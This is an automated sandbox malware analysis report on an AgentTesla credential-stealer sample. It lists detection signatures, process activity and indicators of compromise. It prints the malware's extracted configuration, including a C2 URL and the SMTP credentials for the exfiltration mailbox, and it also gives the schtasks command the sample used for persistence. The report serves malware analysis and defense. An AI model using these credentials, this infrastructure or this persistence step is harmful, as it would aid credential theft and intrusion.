Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Win32.18332.23451

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.18332.23451 (renamed file extension from 23451 to exe)
Analysis ID:356591
MD5:17bc24cedb444e05e229b89cb01c2f6a
SHA1:ad3525d6632697df6ea38f6f8aecad40fa24cb59
SHA256:196cb5a816d8bfb1a12710e8d6b836cdda2de48249c22ccb584014f4e1140b37

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Win32.18332.exe (PID: 6660 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe' MD5: 17BC24CEDB444E05E229B89CB01C2F6A)
    • schtasks.exe (PID: 6776 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "=0A9Rq2Qc9Z7I6K", "URL: ": "http://onNZeSBttjiYV.com", "To: ": "assist@adipico.com", "ByHost: ": "mail.privateemail.com:587", "Password: ": "tBnp1i71JQsPkq", "From: ": "assist@adipico.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.503288877.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.256848619.0000000004239000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.508389170.000000000314E000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.258031189.00000000044E9000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Win32.18332.exe.4503250.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.SecuriteInfo.com.Win32.18332.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.SecuriteInfo.com.Win32.18332.exe.4503250.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SecuriteInfo.com.Win32.18332.exe.4403ba0.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.SecuriteInfo.com.Win32.18332.exe.43a6580.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Scheduled temp file as task from temp locationShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe' , ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe, ParentProcessId: 6660, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp', ProcessId: 6776

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: SecuriteInfo.com.Win32.18332.exe.6844.5.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "=0A9Rq2Qc9Z7I6K", "URL: ": "http://onNZeSBttjiYV.com", "To: ": "assist@adipico.com", "ByHost: ": "mail.privateemail.com:587", "Password: ": "tBnp1i71JQsPkq", "From: ": "assist@adipico.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\mwflisJj.exeReversingLabs: Detection: 35%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Win32.18332.exeVirustotal: Detection: 26%Perma Link
                      Source: SecuriteInfo.com.Win32.18332.exeReversingLabs: Detection: 35%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\mwflisJj.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: SecuriteInfo.com.Win32.18332.exeJoe Sandbox ML: detected
                      Source: 5.2.SecuriteInfo.com.Win32.18332.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                      Compliance:

                      barindex
                      Uses 32bit PE filesShow sources
                      Source: SecuriteInfo.com.Win32.18332.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                      Source: SecuriteInfo.com.Win32.18332.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://onNZeSBttjiYV.com
                      Source: global trafficTCP traffic: 192.168.2.7:49746 -> 198.54.122.60:587
                      Source: Joe Sandbox ViewIP Address: 198.54.122.60 198.54.122.60
                      Source: global trafficTCP traffic: 192.168.2.7:49746 -> 198.54.122.60:587
                      Source: unknownDNS traffic detected: queries for: mail.privateemail.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514085301.0000000006B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.509767240.00000000031C2000.00000004.00000001.sdmpString found in binary or memory: http://mail.privateemail.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.508389170.000000000314E000.00000004.00000001.sdmpString found in binary or memory: http://onNZeSBttjiYV.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.508389170.000000000314E000.00000004.00000001.sdmpString found in binary or memory: http://onNZeSBttjiYV.comT
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpString found in binary or memory: http://ozGnLl.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comage
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comjK
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241053632.00000000063F4000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comvK
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaYyz
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261309421.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrita
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261309421.00000000063E8000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoitu
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.243051954.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsief
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.240672003.00000000063F0000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Byq
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Ian
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242016784.00000000063E6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Kyh
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0bdPy
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0tr
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Yyz
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-d
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242087812.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/anie
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241504758.00000000063E3000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/e
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241732490.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ers
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242087812.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Kyh
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.242202292.00000000063E7000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/py?
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000003.241732490.00000000063EA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/str
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.261930270.00000000075F2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.514048198.0000000006AB0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256848619.0000000004239000.00000004.00000001.sdmp, SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.503288877.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012F58A0 SetWindowsHookExW 0000000D,00000000,?,?5_2_012F58A0
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large stringsShow sources
                      Source: SecuriteInfo.com.Win32.18332.exe, LogIn.csLong String: Length: 13656
                      Source: mwflisJj.exe.0.dr, LogIn.csLong String: Length: 13656
                      Source: 0.2.SecuriteInfo.com.Win32.18332.exe.db0000.0.unpack, LogIn.csLong String: Length: 13656
                      Source: 0.0.SecuriteInfo.com.Win32.18332.exe.db0000.0.unpack, LogIn.csLong String: Length: 13656
                      Source: 3.0.SecuriteInfo.com.Win32.18332.exe.2d0000.0.unpack, LogIn.csLong String: Length: 13656
                      Source: 3.2.SecuriteInfo.com.Win32.18332.exe.2d0000.0.unpack, LogIn.csLong String: Length: 13656
                      Source: 4.2.SecuriteInfo.com.Win32.18332.exe.2e0000.0.unpack, LogIn.csLong String: Length: 13656
                      Source: 4.0.SecuriteInfo.com.Win32.18332.exe.2e0000.0.unpack, LogIn.csLong String: Length: 13656
                      Source: 5.2.SecuriteInfo.com.Win32.18332.exe.a40000.1.unpack, LogIn.csLong String: Length: 13656
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 0_2_0320C2B00_2_0320C2B0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 0_2_032099900_2_03209990
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012456085_2_01245608
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012406E05_2_012406E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012559405_2_01255940
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_0125E0805_2_0125E080
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_01255F785_2_01255F78
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012566B05_2_012566B0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_0127F1A85_2_0127F1A8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_01275E205_2_01275E20
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012704005_2_01270400
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_0127D8A05_2_0127D8A0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_0127BA985_2_0127BA98
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012775705_2_01277570
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_01279E185_2_01279E18
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012F21285_2_012F2128
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012FF0205_2_012FF020
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeCode function: 5_2_012F7E185_2_012F7E18
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\mwflisJj.exe 196CB5A816D8BFB1A12710E8D6B836CDDA2DE48249C22CCB584014F4E1140B37
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamebWUwFuxPxMCHlKXATBQPgcdLwlFugIIAGRp.exe4 vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.262583797.0000000009790000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.262583797.0000000009790000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.262394170.00000000096A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256848619.0000000004239000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000000.235663973.0000000000E38000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize5264.exe6 vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000003.00000002.253025338.0000000000358000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize5264.exe6 vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000004.00000002.253964962.0000000000368000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize5264.exe6 vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.503288877.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamebWUwFuxPxMCHlKXATBQPgcdLwlFugIIAGRp.exe4 vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.505495860.0000000001280000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.504090728.0000000000F30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.503898293.0000000000AC8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStaticArrayInitTypeSize5264.exe6 vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.505363610.0000000001220000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000005.00000002.504048441.0000000000EF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exeBinary or memory string: OriginalFilenameStaticArrayInitTypeSize5264.exe6 vs SecuriteInfo.com.Win32.18332.exe
                      Source: SecuriteInfo.com.Win32.18332.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: SecuriteInfo.com.Win32.18332.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: mwflisJj.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
